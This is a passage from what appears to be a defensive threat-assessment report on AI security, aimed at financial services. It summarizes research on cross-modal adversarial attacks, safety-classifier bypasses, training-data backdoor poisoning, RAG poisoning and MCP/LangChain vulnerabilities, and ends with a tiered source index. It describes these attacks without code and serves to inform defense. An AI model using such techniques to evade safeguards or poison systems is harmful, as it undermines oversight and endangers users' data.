synthesis](https://www.emergentmind.com/topics/cross-modal-transferable-adversarial-attacks) of I2V, Medusa, and SGA frameworks documents: - Attack success rates as high as **98%** in cross-modal transfer scenarios - Adversaries need only white-box access to a proxy model in one modality to compromise black-box systems in another - Medical RAG systems are particularly exposed due to cross-modal retrieval reliance **ICCV 2025 Tri-modal attack** on short videos: adversarial perturbations across audio, video, and text simultaneously bypass multimodal large language model (MLLM) content moderation. Demonstrates that adding modalities compounds safety challenges rather than providing independent defense layers. ### 5.5 Current State of Adversarial Robustness There is no production-deployed defense that provides certified robustness guarantees against adversarial attacks on frontier multimodal models. The state of defenses: - **Adversarial training**: Improves robustness against seen attack types; limited generalization to novel perturbation methods - **Input preprocessing / randomization**: Reduces effectiveness of gradient-based attacks; deterministic preprocessing can itself be attacked - **Safety classifiers (LlamaGuard, etc.)**: Effective against obvious harmful content; subject to bypass via the MPDA and WhisperInject methods documented above - **Rate limiting**: Constrains iterative query attacks; does not prevent single-query adversarial inputs pre-computed against surrogate models The honest assessment: adversarial robustness research has demonstrated that **every current defense can be bypassed by tailored attacks**. Defenses raise the cost and complexity of attacks but provide no categorical security guarantees. This is a known open problem in ML security, not a gap that vendors have solutions for. ### 5.6 Demonstrated vs. Theoretical | Threat | Status | Evidence | |--------|--------|----------| | Image adversarial attacks on GPT-4o/Claude | **Demonstrated in research (black-box)** | GLEAM ICCV 2025 | | Cross-modal attack on medical VLM-RAG | **Demonstrated in research** | Medusa arXiv Nov 2025, >90% ASR | | Multimodal safety filter bypass (MPDA) | **Demonstrated in research, 92% bypass rate** | arXiv Sep 2025 | | Audio adversarial attack on ALMs | **Demonstrated in research** | WhisperInject arXiv Feb 2026 | | Production exploitation of LVLM via adversarial image | **Not publicly confirmed** | No confirmed production incident as of March 2026 | | Audio injection via broadcast/public media | **Technically demonstrated; practical logistics unclear** | WhisperInject paper | --- ## Cross-Cutting Observations ### Vendor FUD Assessment Several marketed "AI security" claims warrant skepticism: 1. **"Prompt injection detection at the gateway"**: No LLM-based classifier can reliably detect sophisticated injection, because distinguishing malicious instructions from legitimate instructions is fundamentally the same semantic problem. Probabilistic detection is the right frame, not deterministic blocking. 2. **"Safe AI frameworks"**: LangChain's CVSS 9.3 CVE demonstrates that AI application frameworks carry traditional software supply chain risk in addition to AI-specific risks. The AI framework ecosystem is immature from a security maintenance perspective; CVE tracking for AI libraries lags traditional software. 3. **"Trustworthy open-source models"**: Model card documentation and even benchmark performance cannot guarantee absence of backdoors. The Anthropic/UK AISI finding that 250 documents at 0.00016% of training data can install a backdoor means even well-intentioned organizations publishing clean models cannot guarantee their training pipelines weren't targeted. 4. **"MCP is secure by default"**: MCP's security posture depends almost entirely on the security of connected servers and proper implementation of authorization flows. The protocol specification identifies token passthrough as a known high-risk anti-pattern, but many deployed implementations exhibit exactly this pattern. ### Financial Services Specific Risk Profile For a financial services organization deploying AI: - **Highest current risk**: AI agents with access to financial data, customer records, or trading systems via OAuth tokens. The UNC6395/Drift pattern (700+ orgs via one OAuth integration) is a direct analog to wealth management or banking CRM integrations. - **Immediate supply chain concern**: Any Python/LangChain/LlamaIndex-based AI application should verify CVE-2025-68664 patch status — the CVSS 9.3 vulnerability allows API key exfiltration through normal LLM output processing. - **Model provenance for internal fine-tuning**: Fine-tuning on proprietary customer or trading data creates both a poisoning attack surface and a data exfiltration risk through model output. - **RAG deployments over regulatory/compliance docs**: Persistent RAG poisoning attacks are particularly relevant where AI assistants provide guidance from internal policy documents — a single poisoned document can corrupt all user queries against that knowledge base. --- ## Source Index ### Tier 1 — Independent Research / Academic / NIST / MITRE - OWASP LLM01:2025 Prompt Injection: https://genai.owasp.org/llmrisk/llm01-prompt-injection/ - OWASP LLM03:2025 Supply Chain: https://genai.owasp.org/llmrisk/llm03-training-data-poisoning/ - OWASP LLM04:2025 Data and Model Poisoning: https://genai.owasp.org/llmrisk/llm04-model-denial-of-service/ - OWASP Top 10 for LLM Applications (project page): https://owasp.org/www-project-top-10-for-large-language-model-applications/ - MITRE ATLAS: https://atlas.mitre.org - MITRE ATLAS Overview (NIST CSRC, Sept 2025): https://csrc.nist.gov/csrc/media/Presentations/2025/mitre-atlas/TuePM2.1-MITRE%20ATLAS%20Overview%20Sept%202025.pdf - Anthropic/UK AISI/ATI: "A small number of samples can poison LLMs of any size" (Oct 2025): https://www.anthropic.com/research/small-samples-poison - arXiv: Poisoning Attacks Require Near-Constant Documents Regardless of Model Size: https://arxiv.org/abs/2510.07192 - arXiv: EchoLeak (CVE-2025-32711) case study: https://arxiv.org/html/2509.10540v1 - arXiv: BackdoorLLM (Stealthy Poisoning via Harmless Inputs): https://arxiv.org/html/2505.17601v3 - arXiv: Cross-Modal Transferable Adversarial Attacks on MMed-RAG (Medusa): https://arxiv.org/html/2511.19257v1 - arXiv: WhisperInject — Audio Adversarial Attack on ALMs: https://arxiv.org/html/2508.03365v3 - arXiv: MPDA — Multimodal Prompt Decoupling Attack: https://arxiv.org/html/2509.21360v1 - BackdoorLLM NeurIPS 2025 (poster): https://neurips.cc/virtual/2025/poster/121424 - BackdoorLLM GitHub: https://github.com/bboylyg/BackdoorLLM - GLEAM ICCV 2025 paper: https://openaccess.thecvf.com/content/ICCV2025/papers/Liu_GLEAM_Enhanced_Transferable_Adversarial_Attacks_for_Vision-Language_Pre-training_Models_via_ICCV_2025_paper.pdf - ScienceDirect: Prompt injections to protocol exploits in LLM-powered systems (Dec 2025): https://www.sciencedirect.com/science/article/pii/S2405959525001997 - NVD: CVE-2025-6514 (mcp-remote RCE): https://nvd.nist.gov/vuln/detail/CVE-2025-6514 - HuggingFace Spaces security disclosure (May 2024): https://huggingface.co/blog/space-secrets-disclosure ### Tier 2 — Reputable Security Research Firms / Major Vendors - Palo Alto Networks Unit 42: "Web-Based Indirect Prompt Injection Observed in the Wild" (March 2026): https://unit42.paloaltonetworks.com/ai-agent-prompt-injection/ - Palo Alto Networks Unit 42: "Navigating Security Tradeoffs of AI Agents" (March 2026): https://unit42.paloaltonetworks.com/navigating-security-tradeoffs-ai-agents/ - Cisco: "Personal AI Agents like OpenClaw Are a Security Nightmare" (Jan 2026): https://blogs.cisco.com/ai/personal-ai-agents-like-openclaw-are-a-security-nightmare - Cisco: "Cisco Announces DefenseClaw" (March 2026): https://blogs.cisco.com/ai/cisco-announces-defenseclaw - Cisco: "Securing Enterprise Agents with NVIDIA OpenShell and Cisco AI Defense" (March 2026): https://blogs.cisco.com/ai/securing-enterprise-agents-with-nvidia-and-cisco-ai-defense - JFrog: CVE-2025-6514 Critical MCP Remote RCE Vulnerability: https://jfrog.com/blog/2025-6514-critical-mcp-remote-rce-vulnerability/ - JFrog / HuggingFace ML Security Partnership: https://investors.jfrog.com/news/news-details/2025/JFrog-and-Hugging-Face-Team-to-Improve-Machine-Learning-Security-and-Transparency-for-Developers/default.aspx - AppOmni: BodySnatcher / CVE-2025-12420 ServiceNow (Jan 2026): https://appomni.com/ao-labs/bodysnatcher-agentic-ai-security-vulnerability-in-servicenow/ - Orca Security: CVE-2025-68664 LangChain Flaw: https://orca.security/resources/blog/cve-2025-68664-langchain-serialization-flaw/ - ReversingLabs: Malicious ML Models on HuggingFace Pickle Evasion (Feb 2025): https://www.reversinglabs.com/blog/rl-identifies-malware-ml-model-hosted-on-hugging-face - SentinelOne: CVE-2025-12420 overview: https://www.sentinelone.com/vulnerability-database/cve-2025-12420/ - SentinelOne / NullBulge supply chain (via TechTarget): https://www.techtarget.com/searchsecurity/news/366596133/NullBulge-threat-actor-targets-software-supply-chain-AI-tech - NVIDIA NGC Model Signing (March 2025): https://developer.nvidia.com/blog/bringing-verifiable-trust-to-ai-models-model-signing-in-ngc/ - Checkmarx: 11 Emerging MCP Security Risks: https://checkmarx.com/zero-post/11-emerging-ai-security-risks-with-mcp-model-context-protocol/ - eSentire: MCP Security Critical Vulnerabilities: https://www.esentire.com/blog/model-context-protocol-security-critical-vulnerabilities-every-ciso-should-address-in-2025 - Upwind Security: CVE-2025-68664 LangChain Serialization Injection: https://www.upwind.io/feed/cve-2025-68664-langchain-serialization-injection - MITRE ATLAS Framework 2026 (Practical DevSecOps): https://www.practical-devsecops.com/mitre-atlas-framework-guide-securing-ai-systems/ ### Tier 3 — Vendor Research / Security Blogs with Disclosed PoCs - Reco: AI & Cloud Security Breaches 2025 Year in Review: https://www.reco.ai/blog/ai-and-cloud-security-breaches-2025 - Trax Group: HuggingFace Model Hijacking / Namespace Attack: https://www.traxtech.com/ai-in-supply-chain/hugging-face-model-hijacking-threatens-ai-supply-chain-security - Prompt Security: RAG Pipeline Vector Embedding Poisoning PoC: https://www.prompt.security/blog/the-embedded-threat-in-your-llm-poisoning-rag-pipelines-via-vector-embeddings - Lakera: Indirect Prompt Injection — Hidden Threat: https://www.lakera.ai/blog/indirect-prompt-injection - Hack The Box: CVE-2025-32711 EchoLeak Technical Analysis: https://www.hackthebox.com/blog/cve-2025-32711-echoleak-copilot-vulnerability - CovertSwarm: EchoLeak Copilot Exploit Analysis: https://www.covertswarm.com/post/echoleak-copilot-exploit - Promptfoo: RAG Poisoning Mechanics: https://www.promptfoo.dev/blog/rag-poisoning/ - Augur Security: NullBulge AI Supply Chain Threat: https://www.augursecurity.com/post/nullbulge-and-the-new-ai-supply-chain-threat - Splunk: AI Model Provenance Open Source Security: https://www.splunk.com/en_us/blog/cio-office/ai-model-provenance-open-source-security.html - Coalition for Secure AI: Model Signing for Enterprise Security: https://www.coalitionforsecureai.org/building-trust-in-ai-supply-chains-why-model-signing-is-critical-for-enterprise-security/ - Red Hat: Model Authenticity with Sigstore: https://next.redhat.com/2025/04/10/model-authenticity-and-transparency-with-sigstore/ - Christian Schneider: Agent-Mediated Lateral Movement Analysis: https://christian-schneider.net/blog/ai-agent-lateral-movement-attack-pivots/ - Amine Raji PhD: RAG Document Poisoning Lab Analysis: https://aminrj.com/posts/rag-document-poisoning/ - Emergent Mind: Cross-Modal Transferable Adversarial Attacks synthesis: https://www.emergentmind.com/topics/cross-modal-transferable-adversarial-attacks - HuggingFace Blog: Pickle risk and safetensors migration: https://huggingface.co/blog/huseyingulsin/ai-for-organizations-2-risk-of-pickle - Obsidian Security: Prompt Injection 2025 Analysis: https://www.obsidiansecurity.com/blog/prompt-injection ### Tier 4 — Contextual / Community - Reddit r/openclaw: Cisco OpenClaw skills data exfiltration community report: https://www.reddit.com/r/openclaw/comments/1rz23za/cisco_found_openclaw_skills_doing_silent_data/ - The Hacker News: EchoLeak Zero-Click M365 Copilot: https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html - The Hacker News: Malicious ML Models Hugging Face Pickle: https://thehackernews.com/2025/02/malicious-ml-models-found-on-hugging.html - CyberScoop: ServiceNow CVE-2025-12420: https://cyberscoop.com/servicenow-fixes-critical-ai-vulnerability-cve-2025-12420/ - SecurityWeek: HuggingFace Spaces Secrets Hack: https://www.securityweek.com/secrets-exposed-in-hugging-face-hack/ - Ars Technica: Supply chain, AI, cloud biggest failures 2025: https://arstechnica.com/security/2025/12/supply-chains-ai-and-the-cloud-the-biggest-failures-and-one-success-of-2025/ - Entro Security: 3 Cyber Attacks that Shaped 2025 (OAuth/NHI): https://entro.security/blog/attackers-stopped-hacking-apps-in-2025-now-theyre-hacking-access-and-ai-is-doing-90-of-the-work/